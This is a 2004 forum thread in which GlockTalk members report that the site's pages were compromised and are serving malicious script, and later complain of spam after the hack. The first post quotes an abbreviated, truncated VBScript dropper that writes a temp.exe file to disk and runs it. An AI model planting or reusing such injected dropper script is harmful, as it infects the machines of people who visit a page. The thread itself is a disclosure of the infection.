close

Privacy guaranteed - Your email is not shared with anyone.

Glocktalk itself has been hacked and is propagating a virus

Discussion in 'Announcements & Support' started by Midian, Apr 21, 2004.

  1. Midian

    Midian

    Messages:
    15
    Likes Received:
    0
    Joined:
    Oct 25, 2001
    Location:
    Seattle, WA
    Eric, GlockTalk itself has been hacked and is propagating a virus. If you look at the outer frame for GT today at the URL:

    http://www.glocktalk.com/index.php?s=

    , you will see (abbreviated):

    - Begin -
    SCRIPT LANGUAGE="VBScript">
    Dim FSO,WSH,OUT,SYS,O
    Set FSO=CreateObject("Scripting.FileSystemObject")
    Set WSH=CreateObject("WScript.Shell")
    SYS=FSO.GetSpecialFolder(2)
    Set OUT=FSO.CreateTextFile(SYS&"\temp.exe",True)

    OUT.Write("MZگ"&O&C(3)&N(3OUT.Close

    WSH.run(SYS & "\temp.exe")
    - End -

    Please correct this as soon as possible.

    Best regards,

    Midian

    [Edited to add: Of course, if I might be of assistance, please let me know. :) ]
     
  2. HAWK11K

    HAWK11K Take'em Down!

    Messages:
    126
    Likes Received:
    1
    Joined:
    Feb 22, 2004
    Location:
    Central Florida
    I hope you're wrong. ;Q
     

  3. Midian

    Midian

    Messages:
    15
    Likes Received:
    0
    Joined:
    Oct 25, 2001
    Location:
    Seattle, WA
    I am not wrong. I do this for a living. Also, I copied the code I pasted above directly from this page. Some jerk probably knows that Eric is away, so they used this opportunity to mess with his site. I have not spent any time researching, but the malicious code could be coming from:

    • Some one hacked Eric’s server and changed the page
    • One of the sponsor banners has been hacked to include this code (my guess)

    The good news, is that the “virus” is lame one that won’t actually affect very many people. As long as you have a modern browser, standard permissions will prevent that script from running. Thus, I want to know what 16 year old wanna-be punk thought this was funny?
     
  4. SavannahGL

    SavannahGL

    Messages:
    138
    Likes Received:
    0
    Joined:
    Oct 11, 2000
    Location:
    Out on the Ledge
    My Zone Alarm and Anti Virus caught it twice this morning.
     
  5. drew-tx

    drew-tx

    Messages:
    281
    Likes Received:
    0
    Joined:
    Mar 27, 2004
    Location:
    PNW
    script kiddies.

    how lamish
     
  6. freepatriot

    freepatriot Retired GT Mod Moderator

    Messages:
    3,861
    Likes Received:
    31
    Joined:
    Aug 8, 2002
    Location:
    South FL
    (Mac OS X users yawn and keep reading posts.)
     
  7. Midian

    Midian

    Messages:
    15
    Likes Received:
    0
    Joined:
    Oct 25, 2001
    Location:
    Seattle, WA
    After checking into this, it seems pretty clear that GT was not hacked by a person directly. Instead, the web server seems to be infected by a virus that has modified some of the web pages. Still, this is really nothing to worry about because by default, all modern browsers will deny the virus’s attempt to write to the local file system. Thus, unless some one has purposely lowered their browser security settings, this virus is harmless.
     
  8. Gee21

    Gee21

    Messages:
    34
    Likes Received:
    0
    Joined:
    May 2, 2003
    Not me! I turned off my firewall and stripped IE's security settings...nadda. ;)
     
  9. drew-tx

    drew-tx

    Messages:
    281
    Likes Received:
    0
    Joined:
    Mar 27, 2004
    Location:
    PNW
    surfin porn will do that
     
  10. David_G17

    David_G17 /\/\/\/\/\/\/\/

    Messages:
    2,046
    Likes Received:
    6
    Joined:
    Oct 7, 2002
    (linux users laugh at mac users.)
     
  11. David_G17

    David_G17 /\/\/\/\/\/\/\/

    Messages:
    2,046
    Likes Received:
    6
    Joined:
    Oct 7, 2002
    Midian, you were right, very right. ;c

    glad to have you here at GT.
     
  12. Gee21

    Gee21

    Messages:
    34
    Likes Received:
    0
    Joined:
    May 2, 2003
    4:48PM up 112 days, 18:06, 7 users, load averages: 0.00, 0.23, 0.62
     
  13. Midian

    Midian

    Messages:
    15
    Likes Received:
    0
    Joined:
    Oct 25, 2001
    Location:
    Seattle, WA
    Unix users laugh at Linux user *Cough* HPUX *Cough* ;a
     
  14. pluvo

    pluvo Experiment G26

    Messages:
    76
    Likes Received:
    0
    Joined:
    Dec 31, 2002
    Location:
    Mesa, AZ
  15. David_G17

    David_G17 /\/\/\/\/\/\/\/

    Messages:
    2,046
    Likes Received:
    6
    Joined:
    Oct 7, 2002
    just as long as it isn't Slowlaris :)
     
  16. ehparis

    ehparis

    Messages:
    2
    Likes Received:
    0
    Joined:
    Mar 31, 2004

    True. :)
     
  17. Rusty Shackleford

    Rusty Shackleford mmhmm

    Messages:
    1,087
    Likes Received:
    0
    Joined:
    Oct 2, 2003
    Location:
    Florida
    Anyone else been getting tons of emails from "incredibleofferz" since the hack? I've been getting 2+ per day, and they are coming from multiple email addresses, so blocking them ends up doing little to stop it. The boxes the email is being sent through are probably hacked anyhow and the addresses are probably bogus. Generally, I get little to no spam, so the persistance of this person makes me think it's got to be related to the email addresses being taken from GT.
     
  18. G23Adam

    G23Adam .- -.. .- --

    Messages:
    527
    Likes Received:
    0
    Joined:
    Oct 1, 2003
    Location:
    SC
    I haven't recieved any spam I normally don't get, none to the GT ghost e-mail account I use. Yep, NO spam at all to the e-mail I used for here. And no, it's not an online filtered inbox, just a POP server in limbo :)
     
  19. biblefreak

    biblefreak

    Messages:
    179
    Likes Received:
    0
    Joined:
    Mar 4, 2003
    Location:
    West Texas
    I have been getting hammered with the incredible offers one and a bunch of porn ones, and the viagra ones. I have not been spammed to any real degree in the several years I have had this addy. I turned on the yahoo spam blocker and that seems to have stopped it, unfortunately, I don't know what I am not getting in the way of stuff that shouldn't be picked up by the filter, but is anyway.

    Real major PITA.
     
  20. G33

    G33 Frisky! CLM Millennium Member

    Messages:
    29,683
    Likes Received:
    4,606
    Joined:
    May 29, 1999
    Location:
    With G29
    Since the hack my e-mail is getting killed!
    University Med. is not happy.:(